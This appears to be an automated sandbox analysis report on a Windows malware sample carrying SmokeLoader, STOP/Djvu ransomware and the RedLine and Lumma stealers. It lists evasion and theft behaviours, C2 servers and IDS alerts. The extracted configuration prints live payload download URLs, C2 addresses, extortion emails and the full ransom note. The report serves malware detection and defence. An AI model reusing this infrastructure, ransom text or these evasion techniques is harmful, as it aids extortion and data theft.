Windows Analysis Report
MdeeRbWvqe.exe

Overview

General Information

Sample name: MdeeRbWvqe.exe
renamed because original name is a hash value
Original sample name: 817d3b2845b7869b9fc71086755bef75.exe
Analysis ID: 1427102
MD5: 817d3b2845b7869b9fc71086755bef75
SHA1: 62afe642e08e778593a54c053af79cb2efecbe6b
SHA256: 8a2abd6e386df2a7e44e4bfa90a327b92eccdf343341ef7a984b3b2bd796c1fa
Tags: AsyncRATexeRAT
Infos:

Detection

LummaC, Babuk, Djvu, LummaC Stealer, RedLine, SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Found ransom note / readme
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Babuk Ransomware
Yara detected Djvu Ransomware
Yara detected LummaC Stealer
Yara detected RedLine Stealer
Yara detected SmokeLoader
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Detected VMProtect packer
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
High number of junk calls founds (likely related to sandbox DOS / API hammering)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies existing user documents (likely ransomware behavior)
Modifies the hosts file
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Writes a notice file (html or txt) to demand a ransom
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops certificate files (DER)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
Babuk Babuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk
Name Description Attribution Blogpost URLs Link
STOP, Djvu STOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stop
Name Description Attribution Blogpost URLs Link
RedLine Stealer RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
Name Description Attribution Blogpost URLs Link
SmokeLoader The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

AV Detection

barindex
Source: MdeeRbWvqe.exe Avira: detected
Source: C:\Users\user\AppData\Local\Temp\filename.exe Avira: detection malicious, Label: TR/Agent.qjsgu
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Avira: detection malicious, Label: HEUR/AGEN.1318266
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Avira: detection malicious, Label: HEUR/AGEN.1318266
Source: C:\ProgramData\Google\Chrome\updater.exe Avira: detection malicious, Label: TR/Agent.qjsgu
Source: C:\Users\user\AppData\Roaming\uthsueb Avira: detection malicious, Label: HEUR/AGEN.1318266
Source: C:\Users\user\AppData\Local\Temp\C12E.exe Avira: detection malicious, Label: HEUR/AGEN.1316977
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: 0000000E.00000002.2068427651.0000000004A70000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Djvu {"Download URLs": ["http://sdfjhuz.com/dl/build2.exe", "http://sajdfue.com/files/1/build3.exe"], "C2 url": "http://sajdfue.com/test1/get.php", "Ransom note file": "_README.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/df01994dd8d37c2c33469922f8e7155a20240402134014/fd95b0\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0859PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E
Source: 00000005.00000002.1986391859.0000000002E70000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://trad-einmyus.com/index.php", "http://tradein-myus.com/index.php", "http://trade-inmyus.com/index.php"]}
Source: C:\ProgramData\Google\Chrome\updater.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\C12E.exe ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\filename.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Roaming\uthsueb ReversingLabs: Detection: 18%
Source: MdeeRbWvqe.exe ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\uthsueb Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\C12E.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Joe Sandbox ML: detected
Source: MdeeRbWvqe.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00411178 CryptDestroyHash,CryptReleaseContext, 10_2_00411178
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext, 10_2_0040E870
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_0040EA51 CryptDestroyHash,CryptReleaseContext, 10_2_0040EA51
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext, 10_2_0040EAA0
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_0040EC68 CryptDestroyHash,CryptReleaseContext, 10_2_0040EC68
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext, 10_2_00410FC0

Compliance

barindex
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Unpacked PE file: 10.2.A5B6.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Unpacked PE file: 16.2.A5B6.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Unpacked PE file: 17.2.A5B6.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Unpacked PE file: 24.2.A5B6.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Unpacked PE file: 29.2.A5B6.exe.400000.0.unpack
Source: MdeeRbWvqe.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe File created: C:\_README.txt
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe File created: C:\Users\user\_README.txt
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 103.247.10.118:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.177.98:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.177.98:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.177.98:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.177.98:443 -> 192.168.2.4:49774 version: TLS 1.2
Source: unknown HTTPS traffic detected: 192.185.16.114:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.177.98:443 -> 192.168.2.4:49778 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.177.98:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.9.138:443 -> 192.168.2.4:49783 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.177.98:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49790 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49791 version: TLS 1.2
Source: unknown HTTPS traffic detected: 103.247.10.118:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: A5B6.exe, A5B6.exe, 0000000F.00000002.2078107088.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, A5B6.exe, 00000010.00000002.2076702437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, A5B6.exe, 00000011.00000002.2898265462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, A5B6.exe, 00000017.00000002.2181665321.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, A5B6.exe, 00000018.00000002.2190525495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, A5B6.exe, 0000001C.00000002.2266063708.0000000004990000.00000040.00001000.00020000.00000000.sdmp, A5B6.exe, 0000001D.00000002.2276060736.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: filename.exe, 00000025.00000002.2394375815.00007FF6E96D0000.00000040.00000001.01000000.00000019.sdmp
Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: filename.exe, 00000025.00000002.2394375815.00007FF6E96D0000.00000040.00000001.01000000.00000019.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: A5B6.exe, 00000009.00000002.2028759696.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, A5B6.exe, 0000000A.00000002.2049909948.0000000000400000.00000040.00000400.00020000.00000000.sdmp, A5B6.exe, 0000000E.00000002.2068427651.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, A5B6.exe, 0000000F.00000002.2078107088.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, A5B6.exe, 00000010.00000002.2076702437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, A5B6.exe, 00000011.00000002.2898265462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, A5B6.exe, 00000017.00000002.2181665321.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, A5B6.exe, 00000018.00000002.2190525495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, A5B6.exe, 0000001C.00000002.2266063708.0000000004990000.00000040.00001000.00020000.00000000.sdmp, A5B6.exe, 0000001D.00000002.2276060736.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose, 10_2_00410160
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose, 10_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose, 10_2_0040FB98

Networking

barindex
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49736 -> 193.106.175.76:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49737 -> 193.106.175.76:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49738 -> 193.106.175.76:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49739 -> 193.106.175.76:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49740 -> 193.106.175.76:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49741 -> 193.106.175.76:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49742 -> 193.106.175.76:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49743 -> 193.106.175.76:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49745 -> 193.106.175.76:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49746 -> 193.106.175.76:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49747 -> 193.106.175.76:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49749 -> 193.106.175.76:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49750 -> 193.106.175.76:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49751 -> 193.106.175.76:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49755 -> 193.106.175.76:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49756 -> 193.106.175.76:80
Source: Traffic Snort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.4:49757 -> 190.195.60.212:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49758 -> 193.106.175.76:80
Source: Traffic Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 190.195.60.212:80 -> 192.168.2.4:49757
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49759 -> 193.106.175.76:80
Source: Traffic Snort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) 192.168.2.4:49761 -> 5.42.65.50:33080
Source: Traffic Snort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.4:49761 -> 5.42.65.50:33080
Source: Traffic Snort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 5.42.65.50:33080 -> 192.168.2.4:49761
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49762 -> 193.106.175.76:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49763 -> 193.106.175.76:80
Source: Traffic Snort IDS: 2052028 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (greetclassifytalk .shop) 192.168.2.4:58916 -> 1.1.1.1:53
Source: Traffic Snort IDS: 2052037 ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI) 192.168.2.4:49765 -> 172.67.177.98:443
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49764 -> 193.106.175.76:80
Source: Traffic Snort IDS: 2052037 ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI) 192.168.2.4:49768 -> 172.67.177.98:443
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49766 -> 193.106.175.76:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49769 -> 193.106.175.76:80
Source: Traffic Snort IDS: 2046056 ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) 5.42.65.50:33080 -> 192.168.2.4:49761
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49770 -> 193.106.175.76:80
Source: Traffic Snort IDS: 2052037 ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI) 192.168.2.4:49771 -> 172.67.177.98:443
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49772 -> 193.106.175.76:80
Source: Traffic Snort IDS: 2052037 ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI) 192.168.2.4:49774 -> 172.67.177.98:443
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49773 -> 193.106.175.76:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49775 -> 193.106.175.76:80
Source: Traffic Snort IDS: 2052037 ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI) 192.168.2.4:49778 -> 172.67.177.98:443
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49779 -> 193.106.175.76:80
Source: Traffic Snort IDS: 2052037 ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI) 192.168.2.4:49781 -> 172.67.177.98:443
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49780 -> 193.106.175.76:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49782 -> 193.106.175.76:80
Source: Traffic Snort IDS: 2052037 ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI) 192.168.2.4:49784 -> 172.67.177.98:443
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49785 -> 193.106.175.76:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49786 -> 193.106.175.76:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49787 -> 193.106.175.76:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49788 -> 193.106.175.76:80
Source: C:\Windows\explorer.exe Network Connect: 193.106.175.76 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 142.250.9.138 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 103.247.10.118 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 181.128.130.193 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 192.185.16.114 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 198.57.242.153 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 162.159.134.233 443 Jump to behavior
Source: Malware configuration extractor URLs: http://trad-einmyus.com/index.php
Source: Malware configuration extractor URLs: http://tradein-myus.com/index.php
Source: Malware configuration extractor URLs: http://trade-inmyus.com/index.php
Source: Malware configuration extractor URLs: http://sajdfue.com/test1/get.php
Source: global traffic TCP traffic: 192.168.2.4:49761 -> 5.42.65.50:33080
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 16 Apr 2024 23:37:27 GMTContent-Type: application/octet-streamContent-Length: 787456Last-Modified: Tue, 16 Apr 2024 23:30:02 GMTConnection: closeETag: "661f09fa-c0400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7c ff 78 ed 38 9e 16 be 38 9e 16 be 38 9e 16 be 26 cc 83 be 29 9e 16 be 26 cc 95 be 5f 9e 16 be 26 cc 92 be 11 9e 16 be 1f 58 6d be 3b 9e 16 be 38 9e 17 be 56 9e 16 be 26 cc 9c be 39 9e 16 be 26 cc 82 be 39 9e 16 be 26 cc 87 be 39 9e 16 be 52 69 63 68 38 9e 16 be 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 62 84 cd 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 a4 00 00 00 de 89 02 00 00 00 00 40 17 